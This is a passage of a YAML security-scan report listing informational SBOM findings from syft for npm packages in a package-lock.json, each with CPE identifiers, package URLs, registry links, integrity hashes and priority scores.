epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bb2d7c3406b84981
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-extglob 2.1.1'
|
|
title: is-extglob 2.1.1
|
|
description: 'Package discovered: is-extglob 2.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b2879743f62f2c47
|
|
name: is-extglob
|
|
version: 2.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-extglob@2.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz
|
|
integrity: sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 437e0c6e090c00f1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-fullwidth-code-point 3.0.0'
|
|
title: is-fullwidth-code-point 3.0.0
|
|
description: 'Package discovered: is-fullwidth-code-point 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8a7d27e13373f9f8
|
|
name: is-fullwidth-code-point
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-fullwidth-code-point@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz
|
|
integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8b982d6ae21c367b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-glob 4.0.3'
|
|
title: is-glob 4.0.3
|
|
description: 'Package discovered: is-glob 4.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6a2e0a343ed2b45b
|
|
name: is-glob
|
|
version: 4.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-glob@4.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz
|
|
integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==
|
|
dependencies:
|
|
is-extglob: ^2.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f5c20bc28d065782
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-number 7.0.0'
|
|
title: is-number 7.0.0
|
|
description: 'Package discovered: is-number 7.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 19d61645d0264090
|
|
name: is-number
|
|
version: 7.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-number@7.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz
|
|
integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1ec1886de995b530
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-stream 2.0.1'
|
|
title: is-stream 2.0.1
|
|
description: 'Package discovered: is-stream 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0d47a7f43264d12f
|
|
name: is-stream
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-stream@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz
|
|
integrity: sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cd8dbd159ce77812
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-url 1.2.4'
|
|
title: is-url 1.2.4
|
|
description: 'Package discovered: is-url 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0055323086e6dbe0
|
|
name: is-url
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-url@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz
|
|
integrity: sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 25f78dcaa669e646
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: isarray 1.0.0'
|
|
title: isarray 1.0.0
|
|
description: 'Package discovered: isarray 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 14ac0fadd6b69d11
|
|
name: isarray
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/isarray@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz
|
|
integrity: sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b4f550816fd1d6a8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: isexe 2.0.0'
|
|
title: isexe 2.0.0
|
|
description: 'Package discovered: isexe 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 18556628c2ed871d
|
|
name: isexe
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/isexe@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz
|
|
integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 399923db78bd2f5d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jackspeak 3.4.3'
|
|
title: jackspeak 3.4.3
|
|
description: 'Package discovered: jackspeak 3.4.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 668b76a592331d7f
|
|
name: jackspeak
|
|
version: 3.4.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BlueOak-1.0.0
|
|
spdxExpression: BlueOak-1.0.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jackspeak@3.4.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz
|
|
integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==
|
|
dependencies:
|
|
'@isaacs/cliui': ^8.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c7be600d2bcad0a1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jay-peg 1.1.1'
|
|
title: jay-peg 1.1.1
|
|
description: 'Package discovered: jay-peg 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c5304af01a3223ed
|
|
name: jay-peg
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jay-peg@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz
|
|
integrity: sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww==
|
|
dependencies:
|
|
restructure: ^3.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5b403253da2d4e5e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jiti 1.21.7'
|
|
title: jiti 1.21.7
|
|
description: 'Package discovered: jiti 1.21.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a3b57ee8874ce4dc
|
|
name: jiti
|
|
version: 1.21.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jiti@1.21.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz
|
|
integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: feda20014c18c42e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jose 4.15.9'
|
|
title: jose 4.15.9
|
|
description: 'Package discovered: jose 4.15.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0246497cf4065c27
|
|
name: jose
|
|
version: 4.15.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/jose@4.15.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
